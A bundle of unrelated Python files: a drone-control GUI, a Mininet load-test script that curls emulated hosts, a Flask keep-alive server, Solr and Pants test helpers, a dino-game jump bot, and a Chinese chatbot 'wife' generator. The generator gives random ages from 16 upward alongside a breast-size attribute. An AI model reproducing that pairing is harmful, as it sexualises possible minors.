self.battery_str = tki.StringVar()
self.battery_str.set('Battery : ')
self.battery_indicate = tki.Label(textvariable=self.battery_str, width=15, anchor=tki.W, justify='left',
foreground='#ffffff', background='#000000', font=("",16))
self.battery_indicate.pack(fill="both", anchor=tki.W)
self.height_str = tki.StringVar()
self.height_str.set('Altitude : ')
self.height_indicate = tki.Label(textvariable=self.height_str, width=15, anchor=tki.W, justify='left',
foreground='#ffffff', background='#0000a0', font=("",16))
self.height_indicate.pack(fill="both", anchor=tki.W)
self.barcode_str = tki.StringVar()
self.barcode_str.set('')
self.barcode_indicate = tki.Label(textvariable=self.barcode_str, width=15, anchor=tki.W, justify='left',
foreground='#000000', background='#ffffff', font=("",16))
self.barcode_indicate.pack(fill="both", anchor=tki.W)
self.barcode_latest_str = ''
self.btn_landing = tki.Button(
self.root, text="Land", relief="raised", command=self.droneLanding)
self.btn_landing.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_takeoff = tki.Button(
self.root, text="Takeoff", relief="raised", command=self.droneTakeOff)
self.btn_takeoff.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.btn_takeoff = tki.Button(
self.root, text="Auto pilot", relief="raised", command=self._autoPilot)
self.btn_takeoff.pack(side="bottom", fill="both",
expand="yes", padx=10, pady=5)
self.tmp_f = tki.Frame(self.root, width=100, height=2)
self.tmp_f.bind('<KeyPress-w>', self.on_keypress_w)
self.tmp_f.bind('<KeyPress-s>', self.on_keypress_s)
self.tmp_f.bind('<KeyPress-a>', self.on_keypress_a)
self.tmp_f.bind('<KeyPress-d>', self.on_keypress_d)
self.tmp_f.bind('<KeyPress-Up>', self.on_keypress_up)
self.tmp_f.bind('<KeyPress-Down>', self.on_keypress_down)
self.tmp_f.bind('<KeyPress-Left>', self.on_keypress_left)
self.tmp_f.bind('<KeyPress-Right>', self.on_keypress_right)
self.tmp_f.pack(side="bottom")
self.tmp_f.focus_set()
self.hist_txt = tki.Text(self.root, height=16, width=40)
self.hist_txt.pack(side='bottom', fill='both', expand='yes', padx=10, pady=5)
self.root.wm_title("Drone UI")
self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose)
self.video_thread_stop = threading.Event()
self.video_thread = threading.Thread(target=self._video_loop, args=())
self.video_thread.daemon = True
self.video_thread.start()
self.get_GUI_Image_thread_stop = threading.Event()
self.get_GUI_Image_thread = threading.Thread(target = self._getGUIImage)
self.get_GUI_Image_thread.daemon = True
self.get_GUI_Image_thread.start()
self.sending_command_thread_stop = threading.Event()
self.sending_command_thread = threading.Thread(target = self._sendingCommand)
self.sending_command_thread.daemon = True
self.sending_command_thread.start()
self._add_log('app boot')
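# Background thread: keeps self.frame updated with the latest video frame from the drone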
def _video_loop(self):
time.sleep(0.5)
while not self.video_thread_stop.is_set():
if hasattr(self.drone, 'read_video_frame'):
self.frame_lock.acquire()
try:
self.frame = self.drone.read_video_frame()
except:
print('Err : caught a RuntimeError')
self.frame_lock.release()
time.sleep(0.011)
return
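# Background thread: grabs frames, runs the AR pipeline on them and pushes the annotated image to the Tkinter panel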
def _getGUIImage(self):
while not self.get_GUI_Image_thread_stop.is_set():
if hasattr(self.drone, 'read_video_frame'):
self.frame_lock.acquire()
try:
self.frame = self.drone.read_video_frame()
except:
print('Err : caught a RuntimeError')
self.frame_lock.release()
if self.frame is None or self.frame.size == 0:
continue
if self.frame.shape[1] != 960:
continue
if self.get_GUI_Image_thread_stop.is_set():
break
self.frame_lock.acquire()
self.drone_ar.renew_frame(self.frame, self.frame_no, self.now_height, self.ar_cmd, self.ar_val)
self.frame_no += 1
self.image = Image.fromarray(self.frame)
self.drone_ar.draw_txt(self.image, self.ar_cmd, self.ar_val)
self.frame_lock.release()
self.image = ImageTk.PhotoImage(self.image)
self.panel.configure(image=self.image)
self.panel.image = self.image
time.sleep(0.033)
return
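# Background thread: when airborne in auto-pilot mode, fetches the next movement command from the AR module and executes it,
# and keeps the battery/altitude readouts and the latest barcode text up to date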
def _sendingCommand(self):
poling_counter = 0
while not self.sending_command_thread_stop.is_set():
if self.takeoff and (poling_counter % 12) == 0 and self.auto_pilot: # and toggle == 0:
self.ar_cmd, self.ar_val = self.drone_ar.get_command()
if self.ar_cmd== 'up':
self.droneUp(self.ar_val)
elif self.ar_cmd == 'down':
self.droneDown(self.ar_val)
elif self.ar_cmd == 'forward':
self.droneMoveForward(self.ar_val)
elif self.ar_cmd == 'back':
self.droneMoveBackward(self.ar_val)
elif self.ar_cmd == 'left':
self.droneMoveLeft(self.ar_val)
elif self.ar_cmd == 'right':
self.droneMoveRight(self.ar_val)
elif self.ar_cmd == 'rotateLeft':
self.droneCCW(self.ar_val)
elif self.ar_cmd == 'rotateRight':
self.droneCW(self.ar_val)
elif self.ar_cmd == 'stay':
print('>> stay')
tmpstr = self.drone_ar.get_latest_barcode()
if self.barcode_latest_str != tmpstr:
self.barcode_latest_str = tmpstr
self.barcode_str.set(tmpstr)
self._add_log(tmpstr)
self.get_battery()
self.get_height()
poling_counter += 1
time.sleep(0.3)
return
def droneTakeOff(self):
takeoff_response = None
self.drone.set_speed(75)
time.sleep(0.2)
self.drone.takeoff()
time.sleep(0.2)
self.takeoff = True
return
def droneLanding(self):
self.takeoff = False
self.drone.land()
time.sleep(0.2)
return
def _autoPilot(self):
if self.auto_pilot:
self.ar_cmd = 'MANUAL'
self.auto_pilot = False
else:
self.auto_pilot = True
return
def droneCW(self, degree):
self.drone.rotate_cw(degree)
return
def droneCCW(self, degree):
self.drone.rotate_ccw(degree)
return
def droneMoveForward(self, distance):
self.drone.move_forward(distance)
return
def droneMoveBackward(self, distance):
self.drone.move_backward(distance)
return
def droneMoveLeft(self, distance):
self.drone.move_left(distance)
return
def droneMoveRight(self, distance):
self.drone.move_right(distance)
return
def droneUp(self, dist):
self.drone.move_up(dist)
return
def droneDown(self, dist):
self.drone.move_down(dist)
return
def on_keypress_w(self, event):
self.distance = 20
print('Up %d cm' % self.distance)
self.droneUp(self.distance)
return
def on_keypress_s(self, event):
self.distance = 20
print('Down %d cm' % self.distance)
self.droneDown(self.distance)
return
def on_keypress_a(self, event):
self.degree = 10
print('Rotate left %d degree' % self.degree)
self.droneCCW(self.degree)
return
def on_keypress_d(self, event):
self.degree = 10
print('Rotate right %d degree' % self.degree)
self.droneCW(self.degree)
return
def on_keypress_up(self, event):
self.distance = 20
print('forward %d cm' % self.distance)
self.droneMoveForward(self.distance)
return
def on_keypress_down(self, event):
self.distance = 20
print('backward %d cm' % self.distance)
self.droneMoveBackward(self.distance)
return
def on_keypress_left(self, event):
self.distance = 20
print('left %d cm' % self.distance)
self.droneMoveLeft(self.distance)
return
def on_keypress_right(self, event):
self.distance = 20
print('right %d cm' % self.distance)
self.droneMoveRight(self.distance)
return
def on_keypress_enter(self, event):
if self.frame is not None:
self.registerFace()
self.tmp_f.focus_set()
return
def get_battery(self):
self.now_battery = int(self.drone.get_battery())
str_val = 'Battery : ' + str(self.now_battery) + ' [%]'
self.battery_str.set(str_val)
return
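# Read the drone's height (presumably reported in decimetres), convert it to centimetres and
# ignore readings that jump by 100 cm or more from the previous value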
def get_height(self):
int_val = self.drone.get_height()
if int_val != 0:
int_val *=10
if abs(int_val - self.now_height) < 100:
self.now_height = int_val
str_val = 'Altitude : ' + str(self.now_height) + ' [cm]'
self.height_str.set(str_val)
return
def onClose(self):
print('closing 1...')
self.sending_command_thread_stop.set()
self.sending_command_thread.join(1)
if self.sending_command_thread.is_alive():
print('sys exit()...')
sys.exit()
print('closing 2...')
self.video_thread_stop.set()
self.video_thread.join(1)
if self.video_thread.is_alive():
print('sys exit()...')
sys.exit()
print('closing 3...')
self.get_GUI_Image_thread_stop.set()
self.get_GUI_Image_thread.join(1)
if self.get_GUI_Image_thread.is_alive():
print('sys exit()...')
sys.exit()
print('closing 4...')
self.drone.close()
del self.drone
self.root.quit()
return
def _add_log(self, arg_log):
now = datetime.datetime.now(pytz.timezone(TIMEZONE))
nowtimestr = str(now.strftime('%X'))
logstr = nowtimestr + ' : [' + arg_log + ']\n'
self.hist_txt.insert(tki.END, logstr)
return
#eof
|
latry.py
|
import numpy as np
import os
import sys
from mininet.net import Mininet
import threading
from threading import Thread
import time
from datetime import datetime
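# NOTE: 'net' is assumed to be provided by the surrounding Mininet topology script; it is never created in this file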
h1 = net.get('h1')
h2 = net.get('h2')
h3 = net.get('h3')
h4 = net.get('h4')
h5 = net.get('h5')
h6 = net.get('h6')
stop = False
#latency_log = open("latlog.txt", "a")
h1_log = open("h1.txt", "a")
h2_log = open("h2.txt", "a")
h3_log = open("h3.txt", "a")
h4_log = open("h4.txt", "a")
h5_log = open("h5.txt", "a")
h6_log = open("h6.txt", "a")
def timer():
global h1_log
global h2_log
global h3_log
global h4_log
global h5_log
global h6_log
global stop
global threads
print "TIMER IS DONE"
stop = True
h1.cmd("pkill curl | killall curl")
h2.cmd("pkill curl | killall curl")
h3.cmd("pkill curl | killall curl")
h4.cmd("pkill curl | killall curl")
h5.cmd("pkill curl | killall curl")
h6.cmd("pkill curl | killall curl")
os.system("pkill curl")
h1_log.close()
h2_log.close()
h3_log.close()
h4_log.close()
h5_log.close()
h6_log.close()
for pr in threads:
pr.join()
sys.exit()
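# Load generators: each h*_wget thread repeatedly launches a batch of background curl requests
# (batch size drawn from a normal distribution around 14, capped at 28) against the web server
# and appends each request's total transfer time to that host's log file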
def h1_wget():
global h1
global stop
global np
global h1_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h1.cmd("curl -so /dev/null -w '%{time_total}\n' >> h1.txt 10.0.0.8:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
def h2_wget():
global h2
global stop
global np
global h2_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h2.cmd("curl -so /dev/null -w '%{time_total}\n' >> h2.txt 10.0.0.8:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
def h3_wget():
global h3
global stop
global np
global h3_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h3.cmd("curl -so /dev/null -w '%{time_total}\n' >> h3.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
def h4_wget():
global h4
global stop
global np
global h4_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h4.cmd("curl -so /dev/null -w '%{time_total}\n' >> h4.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
######
def h5_wget():
global h5
global stop
global np
global h5_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h5.cmd("curl -so /dev/null -w '%{time_total}\n' >> h5.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
####
def h6_wget():
global h6
global stop
global np
global h6_log
global time
while not stop:
rand = int(np.random.normal(14,14))
if rand <= 0 or rand > 28:
rand = 14
t_start = time.time()
for i in range(rand):
h6.cmd("curl -so /dev/null -w '%{time_total}\n' >> h6.txt 10.0.0.7:80 &")
time.sleep(0.2)
time_to_divide = time.time()
time_passed_since_batch = time_to_divide - t_start
if time_passed_since_batch < 1:
time.sleep(1 - time_passed_since_batch)
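# Launch the selected load-generator threads; the 60-second timer callback stops the run and closes the logs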
threads = []
t = threading.Timer(60, timer)
t.start()
h1_t = Thread(target = h1_wget)
h2_t = Thread(target = h2_wget)
h3_t = Thread(target = h3_wget)
#h4_t = Thread(target = h4_wget)
#h5_t = Thread(target = h5_wget)
#h6_t = Thread(target = h6_wget)
h1_t.start()
threads.append(h1_t)
h2_t.start()
threads.append(h2_t)
h3_t.start()
threads.append(h3_t)
#h4_t.start()
#threads.append(h4_t)
#h5_t.start()
#threads.append(h5_t)
#h6_t.start()
#threads.append(h6_t)
for pr in threads:
pr.join()
h1_log.close()
h2_log.close()
h3_log.close()
h4_log.close()
h5_log.close()
h6_log.close()
|
keep_online.py
|
from flask import Flask
from threading import Thread
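# Tiny Flask app run from a background thread so an external monitor (e.g. an uptime pinger) can reach the process and keep it online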
app = Flask('')
@app.route('/')
def home():
return "Hello. I am online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_online():
t = Thread(target=run)
t.start()
|
utils.py
|
from os.path import dirname, join
from httplib import HTTPConnection
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from StringIO import StringIO
from socket import error
from sys import stderr
from re import search
from collective.solr.local import getLocal, setLocal
from collective.solr import tests
try:
from zope.component.hooks import getSite, setSite
except ImportError:
from zope.app.component.hooks import getSite, setSite
try:
from Zope2.App import zcml
except ImportError:
from Products.Five import zcml
def loadZCMLString(string):
# Unset current site for Zope 2.13
saved = getSite()
setSite(None)
try:
zcml.load_string(string)
finally:
setSite(saved)
def getData(filename):
""" return a file object from the test data folder """
filename = join(dirname(tests.__file__), 'data', filename)
return open(filename, 'r').read()
def fakehttp(solrconn, *fakedata):
""" helper function to set up a fake http request on a SolrConnection """
class FakeOutput(list):
""" helper class to organize output from fake connections """
conn = solrconn
def log(self, item):
self.current.append(item)
def get(self, skip=0):
self[:] = self[skip:]
return ''.join(self.pop(0)).replace('\r', '')
def new(self):
self.current = []
self.append(self.current)
def __len__(self):
self.conn.flush() # send out all pending xml
return super(FakeOutput, self).__len__()
def __str__(self):
self.conn.flush() # send out all pending xml
if self:
return ''.join(self[0]).replace('\r', '')
else:
return ''
output = FakeOutput()
class FakeSocket(StringIO):
""" helper class to fake socket communication """
def sendall(self, str):
output.log(str)
def makefile(self, mode, name):
return self
def read(self, amt=None):
if self.closed:
return ''
return StringIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return ''
return StringIO.readline(self, length)
class FakeHTTPConnection(HTTPConnection):
""" helper class to fake a http connection object from httplib.py """
def __init__(self, host, *fakedata):
HTTPConnection.__init__(self, host)
self.fakedata = list(fakedata)
def putrequest(self, *args, **kw):
self.url = args[1]
response = self.fakedata.pop(0) # get first response
self.sock = FakeSocket(response) # and set up a fake socket
output.new() # as well as an output buffer
HTTPConnection.putrequest(self, *args, **kw)
def setTimeout(self, timeout):
pass
solrconn.conn = FakeHTTPConnection(solrconn.conn.host, *fakedata)
return output
def fakemore(solrconn, *fakedata):
""" helper function to add more fake http requests to a SolrConnection """
assert hasattr(solrconn.conn, 'fakedata') # `isinstance()` doesn't work?
solrconn.conn.fakedata.extend(fakedata)
def fakeServer(actions, port=55555):
""" helper to set up and activate a fake http server used for testing
purposes; <actions> must be a list of handler functions, which will
receive the base handler as their only argument and are used to
process the incoming requests in turn; returns a thread that should
be 'joined' when done """
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def do_GET(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def log_request(*args, **kw):
pass
def runner():
while actions:
server.handle_request()
server = HTTPServer(('', port), Handler)
thread = Thread(target=runner)
thread.start()
return thread
def pingSolr():
""" test if the solr server is available """
status = getLocal('solrStatus')
if status is not None:
return status
conn = HTTPConnection('localhost', 8983)
try:
conn.request('GET', '/solr/admin/ping')
response = conn.getresponse()
status = response.status == 200
msg = "INFO: solr return status '%s'" % response.status
except error, e:
status = False
msg = 'WARNING: solr tests could not be run: "%s".' % e
if not status:
print >> stderr
print >> stderr, '*' * len(msg)
print >> stderr, msg
print >> stderr, '*' * len(msg)
print >> stderr
setLocal('solrStatus', status)
return status
def numFound(result):
match = search(r'numFound="(\d+)"', result)
if match is not None:
match = int(match.group(1))
return match
|
bot.py
|
import pyautogui
import time
from tkinter import *
import threading
#project code dala3
# zone of the screen captured to detect an approaching cactus (left, top, width, height)
detectionZone = (476,176, 20, 150)
# flags controlling the detection loop
BotEnable = False
exitLoop = False
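# Threshold a grayscale pixel value: bright background pixels become 255, dark (cactus) pixels become 0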
def levelFilter(x):
return 255 if x > 126 else 0
def checkLoop():
global detectionRectangle
global w
while not exitLoop:
if BotEnable :
w.itemconfig(detectionRectangle, outline="white")
s = pyautogui.screenshot(region=detectionZone)
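# Sum the thresholded pixels of the detection zone; a dark cactus entering the zone drops the sum below the trigger value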
signature = sum(map(levelFilter, s.convert('L').getdata()))
if signature < 500135 :
w.itemconfig(detectionRectangle, outline="red")
print('jump')
print(signature)
pyautogui.keyDown("space")
time.sleep(0.1)
pyautogui.keyUp("space")
return
x = threading.Thread(target=checkLoop)
x.start()
BotWindow = Tk()
BotWindow.wm_attributes('-alpha',0.2)
w = Canvas(BotWindow, width=200, height=150)
w.pack()
detectionRectangle = w.create_rectangle(47, 22, 23, 103, fill="blue",outline="white", width=3)
def click():
global detectionZone
detectionZone = (BotWindow.winfo_x()+30, BotWindow.winfo_y()+25,20,100)
def toggleEnable():
global BotEnable
BotEnable = not BotEnable
enbBtn['bg']="green" if BotEnable else "red"
w.itemconfig(detectionRectangle, fill="white") if BotEnable else w.itemconfig(detectionRectangle, fill="blue")
def onClose():
global exitLoop
BotWindow.destroy()
exitLoop = True
posBtn = Button(BotWindow,text="Update position", command=click)
enbBtn = Button(BotWindow, text='Toggle',command=toggleEnable)
posBtn.pack()
enbBtn.pack()
BotWindow.protocol("WM_DELETE_WINDOW", onClose)
BotWindow.wm_attributes("-topmost", 1)
BotWindow.mainloop()
|
test_run_tracker.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import http.server
import json
import threading
from builtins import open
from future.moves.urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.util.contextutil import temporary_file_path
from pants_test.test_base import TestBase
class RunTrackerTest(TestBase):
def test_upload_stats(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
length = int(handler.headers['Content-Length'])
post_data = parse_qs(handler.rfile.read(length).decode('utf-8'))
decoded_post_data = {k: json.loads(v[0]) for k, v in post_data.items()}
self.assertEqual(stats, decoded_post_data)
handler.send_response(200)
handler.end_headers()
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return 'http://{}:{}{}'.format(host, port, path)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats))
server.shutdown()
server.server_close()
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
self.assertTrue(RunTracker.write_stats_to_json(file_name, stats))
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
WifeClass.py
|
import string
import linecache
import random
import sched
import threading
import time
import chardet
import nonebot
import requests
from zhon.hanzi import punctuation
from bot_plugins.Get_girl.random_config_index import *
GOD = 1149558764
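# In-memory caches of chat lines: generic sweet talk, yandere lines, and post-marriage lines.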
LoveTalkList = list()
YanDereList = list()
MarryTalkList = list()
# Husband class: binds a user account and tracks a "scumbag" (FuckingBoy) score
class husband:
def __init__(self, ID: str):
self.ID = ID
self.FuckingBoy = 0
def getClass(self):
return self
    # Whether this user counts as a scumbag (score above 20)
    def isFuckingBoy(self) -> bool:
        return self.FuckingBoy > 20
def Random(seq) -> int:
    # Return a random valid index into the given sequence.
    return random.randint(0, len(seq) - 1)
def WifeHair(HairColor: str, HairShape: str) -> str:
    return HairColor + HairShape
@nonebot.scheduler.scheduled_job(
'cron',
second=6
)
def getLoveTalk():
    # Pass the callable itself; calling _getLove() here would run it synchronously
    # and hand Thread a None target.
    threading.Thread(target=_getLove).start()
def _getLove():
    # Fetch a random sweet-talk line and cache it if we have not seen it before.
    url = "https://chp.shadiao.app/api.php"
    data = requests.get(url, timeout=3).text
    if data in LoveTalkList:
        return
    with open('love.txt', 'a') as f:
        f.write(data + '\n')
    LoveTalkList.append(data)
# Wife generation helpers
def is_rightful(word: str):  # check the text uses only "normal" characters (CJK or ASCII letters)
for ch in word:
if not ('\u4e00' <= ch <= '\u9fff' or 'a' <= ch <= 'z' or 'A' <= ch <= 'Z'):
return False
return True
# e.g. deletePunctuation('today is friday, so happy..!!!') -> 'todayisfridaysohappy'
def deletePunctuation(stri: str) -> str:  # strip whitespace plus ASCII and Chinese punctuation
stri = stri.replace(' ', '').replace('\n', '')
punctuation_string = string.punctuation
for i in punctuation_string:
stri = stri.replace(i, '')
for i in punctuation:
stri = stri.replace(i, '')
return stri
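# Wife object: holds the randomly generated profile plus chat / affection state for one husband.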
class WifeObj:
def getMarry(self) -> str:
if self.liking > 999 and not self.isMerry:
self.isMerry = True
elif self.isMerry:
return '我们已经结婚了哦'
return MarriageVow[Random(MarriageVow)] if self.liking > 999 else '你太着急了,让我们再培养培养感情吧'
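    # Dump all attributes into a plain dict (presumably for persistence elsewhere in the plugin).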
def getDict(self) -> dict:
return {
'name': self.name,
'age': self.age,
'husband': self.husband.ID,
'ouBai': self.ouBai,
'height': self.height,
'weight': self.weight,
'character': self.Character,
'bud': self.bud,
'isMerry': self.isMerry,
'liking': self.liking,
'work': self.work,
'race': self.race,
'WifeNickName': self.WifeNickName,
'HusbandNickName': self.HusbandNickName,
'hair': self.Hair,
'eyesColor': self.eyesColor
}
    def setNickName(self, NickName: str, isWife: bool):  # update the wife's (or husband's) nickname
        NickName = deletePunctuation(NickName)  # strip punctuation from the proposed nickname
        if NickName in BanTalkMember:  # reject banned words
            self.liking -= 2  # affection penalty
            return '滚'
        if NickName in self.banNickName:  # she already refused this nickname once
            return '我都说了我不要这个名字'
        if len(NickName) <= 1:
            return '?'  # nickname is empty or too short
        if random.randint(0, self.liking) < 30 or not is_rightful(NickName) or len(NickName) >= 6:
            # Acceptance is probabilistic (more likely at higher affection), and the name must be short and well-formed.
            self.banNickName.append(NickName)
            return '好难听的名字,我不要'
        if isWife:
            self.WifeNickName = NickName
            return '好'
        else:
            self.HusbandNickName = NickName
            return f'好的{self.HusbandNickName}'
    def __init__(self, thisHusband: husband):
        self.husband = thisHusband  # bind the husband object
        self.WifeNickName = '老婆'  # what you call her (default: "wife")
        self.HusbandNickName = "老公"  # what she calls you (default: "husband")
        self.eyesColor = Color[Random(Color)]  # eye colour
        self.banNickName = list()
        self.work = work[Random(work)]  # occupation
        self.Hair = Color[Random(Color)] + Hair[Random(Hair)]  # hair colour + style
        self.race = race[Random(race)]  # race
        self.name = surname[Random(surname)] + name[Random(name)]  # full name
        self.ouBai = ouBaiSize[Random(ouBaiSize)]
        self.Character = Character[Random(Character)]
        self.age = random.randint(16, 24)
        self.height = str(random.randint(150, 170) if self.race !=
                          '矮人' else random.randint(120, 140))
        self.weight = str(random.randint(40, 60))
        self.bud = Bud[Random(Bud)]
        self.liking = random.randint(0, 30)
        self.isMerry = False
        self.isTalk = False
        self.scence = None
        self.isMaxTalkNum = False
    # Finally, register the generated wife in the global WifeDict
def addInWifeDict(self):
WifeDict[self.name] = self
def getHusbandId(self) -> str:
return self.husband.ID
def getLoveScence(self) -> object:
        if self.isMaxTalkNum:
            # Rate limited: lose affection; at -100 or below she leaves for good.
            self.liking -= 20
            if self.liking <= -100:
                WifeDict.pop(self.name, None)
                return '你真的很烦,再见!'
            return '你烦不烦,做你自己的事情去'
data = getScence(self) if self.scence is None else self.scence
self.scence = getScence(self)
self.isMaxTalkNum = True
threading.Thread(target=self.Delay).start()
return data.replace('你', self.HusbandNickName)
    def BanUser(self):
        self.isMaxTalkNum = False  # clear the rate-limit flag so she will chat again
    def Delay(self):  # rate limiting: re-enable chatting after 10 seconds
s = sched.scheduler(time.time, time.sleep)
s.enter(10, 1, self.BanUser)
s.run()
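    # Break up: remove this wife from the registry and reply according to her personality.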
def couples(self) -> str:
WifeDict.pop(self.name)
return f'{self.name}:{Couples[self.Character]}'
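    # Render a human-readable profile card for this wife.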
def WifeIndex(self) -> str:
return f'{self.name}\n' \
f'性格:{self.Character}\n' \
f'种族:{self.race}\n' \
f'职业:{self.work}\n' \
f'特点:{self.bud}\n' \
f'头发:{self.Hair}\n' \
f'瞳色:{self.eyesColor}\n' \
